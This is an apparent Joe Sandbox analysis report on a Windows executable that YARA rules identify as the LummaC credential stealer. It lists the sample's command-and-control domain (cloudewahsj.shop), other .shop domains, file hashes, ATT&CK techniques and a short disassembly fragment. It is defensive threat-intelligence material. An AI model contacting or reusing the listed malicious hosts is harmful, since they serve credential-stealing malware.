Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\BUFZSQPCOH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents\NIRMEKAMZH	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1585486653.000000000064C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SOElePqvtf.exe PID: 7336, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: SOElePqvtf.exe PID: 7336, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Virtualization/Sandbox Evasion	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SOElePqvtf.exe	38%	Virustotal		Browse
SOElePqvtf.exe	45%	ReversingLabs	Win32.Trojan.CrypterX
SOElePqvtf.exe	100%	Avira	HEUR/AGEN.1306978
SOElePqvtf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://cloudewahsj.shop/d	100%	Avira URL Cloud	malware
https://cloudewahsj.shop/api21	100%	Avira URL Cloud	malware
https://cloudewahsj.shop//	100%	Avira URL Cloud	malware
https://cloudewahsj.shop/api	100%	Avira URL Cloud	malware
https://cloudewahsj.shop/apie	100%	Avira URL Cloud	malware
https://cloudewahsj.shop/api-	100%	Avira URL Cloud	malware
https://cloudewahsj.shop/api~:b	100%	Avira URL Cloud	malware
https://cloudewahsj.shop/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cloudewahsj.shop	104.21.64.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
rabidcowse.shop	false		high
wholersorie.shop	false		high
https://cloudewahsj.shop/api	true	Avira URL Cloud: malware	unknown
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop/api21	SOElePqvtf.exe, 00000000.00000002.1585486653.000000000066C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop/d	SOElePqvtf.exe, 00000000.00000003.1387869831.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.4.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop/api~:b	SOElePqvtf.exe, 00000000.00000003.1402292171.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	SOElePqvtf.exe, 00000000.00000003.1418679364.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop//	SOElePqvtf.exe, 00000000.00000003.1387686449.00000000005E6000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1387869831.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop/api-	SOElePqvtf.exe, 00000000.00000003.1387869831.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.micro	SOElePqvtf.exe, 00000000.00000002.1585486653.000000000062B000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1387869831.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	SOElePqvtf.exe, 00000000.00000003.1417534619.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop/	SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005BA000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000002.1585486653.00000000005E6000.00000004.00000020.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1387686449.00000000005C7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	SOElePqvtf.exe, 00000000.00000003.1418679364.00000000031C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudewahsj.shop/apie	SOElePqvtf.exe, 00000000.00000002.1585486653.000000000062B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	SOElePqvtf.exe, 00000000.00000003.1388690934.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, SOElePqvtf.exe, 00000000.00000003.1388822290.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.64.1	cloudewahsj.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584185
Start date and time:	2025-01-04 15:32:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SOElePqvtf.exe renamed because original name is a hash value
Original Sample Name:	b2981d605f25a4617f31b78996de3f78.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 20 Number of non-executed functions: 208
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.246.45, 40.126.31.71, 20.109.210.53
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:33:17	API Interceptor	5x Sleep call for process: SOElePqvtf.exe modified
09:33:39	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.64.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
104.21.64.1	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cloudewahsj.shop	rdFy6abQ61.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
cloudewahsj.shop	7z91gvU.exe	Get hash	malicious	LummaC	Browse	104.21.96.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	rdFy6abQ61.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	HMhdtzxEHf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	9cOUjp7ybm.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	http://livedashboardkit.info	Get hash	malicious	Unknown	Browse	172.67.166.199
	4.elf	Get hash	malicious	Unknown	Browse	1.13.111.69
	31.13.224.14-mips-2025-01-03T22_14_18.elf	Get hash	malicious	Mirai	Browse	1.4.15.193
	random.exe	Get hash	malicious	Unknown	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	rdFy6abQ61.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	9cOUjp7ybm.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	random.exe	Get hash	malicious	Unknown	Browse	104.21.64.1
	random.exe	Get hash	malicious	Unknown	Browse	104.21.64.1
	download.bin.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	hthjjadrthad.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.64.1
	HSBC_PAY.SCR.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.21.64.1
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	104.21.64.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SOElePqvtf.exe_58555184b317d2a4a9cf248bcca3ab33162bc60_06847b8e_4a7b8b0a-c7c8-4434-841c-f0e23e7075f3\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.060378995882795
Encrypted:	false
SSDEEP:	96:WmcFP8h6fJYFkisQhcoX07Jf3QXIDcQp9c6pscE7cw3mK++HbHg/8BRTf3uOycrz:WXLiV09Gh/jvEmFMQzuiFcrZ24IO8qM
MD5:	B3DA1A82FE99AF59CC383414EAED5277
SHA1:	5140478E431799517377987E8D8085BE08057764
SHA-256:	07DB965189E30AA0954BFE357B743D234D7103E9DCD396B876D78A7A1915D237
SHA-512:	F481E51DCDE21BF0A18820DC3AD5F24BFB83F41A4B159C7B3390E3967E86B741A99A93EC702AAB15F1500D44E59BE53AFF346FD367AFF987BF3A8EEA7DC54394
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.4.7.4.8.0.3.2.4.9.7.4.9.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.4.7.4.8.0.3.8.9.0.3.8.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.7.b.8.b.0.a.-.c.7.c.8.-.4.4.3.4.-.8.4.1.c.-.f.0.e.2.3.e.7.0.7.5.f.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.9.b.8.8.8.8.-.9.e.1.9.-.4.4.a.2.-.9.6.1.6.-.9.a.f.0.8.e.f.e.f.f.9.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.O.E.l.e.P.q.v.t.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.8.-.0.0.0.1.-.0.0.1.4.-.b.b.b.0.-.8.7.9.6.b.5.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.8.7.9.f.4.1.6.b.9.2.3.d.8.b.b.c.b.a.3.d.0.b.5.b.0.8.2.e.3.3.0.0.0.0.f.f.f.f.!.0.0.0.0.2.8.5.6.e.6.b.6.7.e.7.c.a.a.7.0.a.9.1.5.7.c.5.4.a.7.1.4.d.9.b.c.c.0.9.c.1.4.d.1.!.S.O.E.l.e.P.q.v.t.f...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5EF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jan 4 14:33:23 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	109790
Entropy (8bit):	2.1681311537619807
Encrypted:	false
SSDEEP:	384:BhS1weHEOdS63TBLSahVKgqBzonAy/l10QomOUDKoCpEfIxDaLOZ+dSJ8XBTn:Breu63TBLSqVJuzonb0QomCnYdJXB7
MD5:	35D727FDAC2F9A1A9989E5584E910F81
SHA1:	E6A6A8DAE7411AE7FD5CAC30A81CBE39D93DB782
SHA-256:	3D55B5F59FF2A8D6E915BFBBF81E4DFEE73B23621714A94F32D383B34AF94CF3
SHA-512:	6350BB2A34F6C0F12DDA52ACE6268B8CC2F8D28FE0EAD5A18355BE338E815CCF7D0F383DFEC982B754CCD1BD40CF52A2A98713D6F3CB219F9B30FE6EB6B4A424
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........Fyg........................p...............h$......T....N..........`.......8...........T...........HE...g...........$...........&..............................................................................eJ......p'......GenuineIntel............T............Fyg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF729.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8358
Entropy (8bit):	3.7012468025999743
Encrypted:	false
SSDEEP:	192:R6l7wVeJ1a60Rvjo6YN3SU9oNjgmf31pDM89buEsfR6m:R6lXJI60Rvjo6YtSU9oNjgmf35u3ft
MD5:	605B8394839EB08AC9D514C5F6C1A516
SHA1:	D0F6EE319C6F0E2D3995529A6292F82B5E31B72E
SHA-256:	CDE3AB59208EB6E22E5D6FEA2B4DC14176FBEBD610840F19BDC217BEEE763B53
SHA-512:	9EEBDAF882E90C3648E0F15EA66A4C8FB3430ADEC3D8745B37F4A400AC7D1CD877C5549F6B8C724F34F39226476D65D6DCBA14F5F6CB3F4A6ADFAD84A461192D
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF759.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4623
Entropy (8bit):	4.497028208299821
Encrypted:	false
SSDEEP:	48:cvIwWl8zsmJg77aI9UvWpW8VYdYm8M4JzWOqF8a+q8F2ODHVYnF39d:uIjf8I7a+7VFJKJLmH+F39d
MD5:	BDC88A2C15792290D5E046FA731B4D2B
SHA1:	97CF4E819145F6CF1F3F5DB53A5E525C6CA07028
SHA-256:	17E699D66FCA251A512A7EEBF46D5A019E0FA27800CB0E34A91713D4F32CEBDA
SHA-512:	DD231575C3C2A884A6D6A07B2E4B608318F63001A137BA449E687BAF7FDC956BFB433A073796E6638741B4F26F90ED2DCB50A34384E7B3936707B671F995998D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="661296" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.416672209822822
Encrypted:	false
SSDEEP:	6144:Tcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNV5+:Ii58oSWIZBk2MM6AFBDo
MD5:	BCBC0DDBE856BB30CA87838A32E3C829
SHA1:	C68F05F400A66285543466B5130A62E29207D6D0
SHA-256:	32548E301FEA2249EC84B3A696D38B498A9C619ED5F7A32AA2EB838D8B2ACD51
SHA-512:	E257E16671E7116BF53672A07D0C1E73D53BC91827D8586B429D3DBA78D92A25C297DA62803842C377C485CCC2ED9EA91217C5A1F810369DBA3CED9CA414FA86
Malicious:	false
Reputation:	low
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....^...............................................................................................................................................................................................................................................................................................................................................z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.408115631297124
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SOElePqvtf.exe
File size:	321'536 bytes
MD5:	b2981d605f25a4617f31b78996de3f78
SHA1:	2856e6b67e7caa70a9157c54a714d9bcc09c14d1
SHA256:	9b88b91290402bb3639d348c0481c5989ef9624147346b568b83095b76a5ed20
SHA512:	8e96326cf29d8c7ccd18d0e34112d7594673f631f1f2bfd74aa489e04650789fa212ce7d5ebf99cb45a3836409c01fe8780206d57ad556c60327c6eb39037859
SSDEEP:	6144:VLet0WO61FlkvTmZ7YPz9YEtGBHJYWDMBAKvsDXVg1/q1:V+BP+LmZk79jtGxJxDqvsDqt
TLSH:	0D64F13178A0D871E45785710833DBA07E6E7C32AAA585AB3B5C277F6E306C193BB315
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.!.g.OCg.OCg.OC...Cf.OCy..CB.OCy..C}.OCy..C..OC@M4C`.OCg.NC..OCy..Cf.OCy..Cf.OCy..Cf.OCRichg.OC........PE..L...&.<f...........

File Icon


Icon Hash:	7141452541434443

Static PE Info

General

Entrypoint:	0x404122
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x663C1126 [Wed May 8 23:56:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	d8ecff67c177ab688915d2b483d1913b

Entrypoint Preview

Instruction
call 00007FF23CDE227Ch
jmp 00007FF23CDDF42Eh
mov edi, edi
push ebp
mov ebp, esp
push edi
mov edi, 000003E8h
push edi
call dword ptr [004010ACh]
push dword ptr [ebp+08h]
call dword ptr [004010A8h]
add edi, 000003E8h
cmp edi, 0000EA60h
jnbe 00007FF23CDDF5B6h
test eax, eax
je 00007FF23CDDF590h
pop edi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007FF23CDDFCF6h
push dword ptr [ebp+08h]
call 00007FF23CDDFB43h
push dword ptr [00443014h]
call 00007FF23CDE06BEh
push 000000FFh
call eax
add esp, 0Ch
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push 00401260h
call dword ptr [004010A8h]
test eax, eax
je 00007FF23CDDF5C7h
push 00401250h
push eax
call dword ptr [00401058h]
test eax, eax
je 00007FF23CDDF5B7h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007FF23CDDF57Dh
pop ecx
push dword ptr [ebp+08h]
call dword ptr [004010B0h]
int3
push 00000008h
call 00007FF23CDE23E6h
pop ecx
ret
push 00000008h
call 00007FF23CDE2303h
pop ecx
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp 00007FF23CDDF5BDh
mov eax, dword ptr [esi]
test eax, eax
je 00007FF23CDDF5B4h

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x417bc	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4e000	0x70a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2d78	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
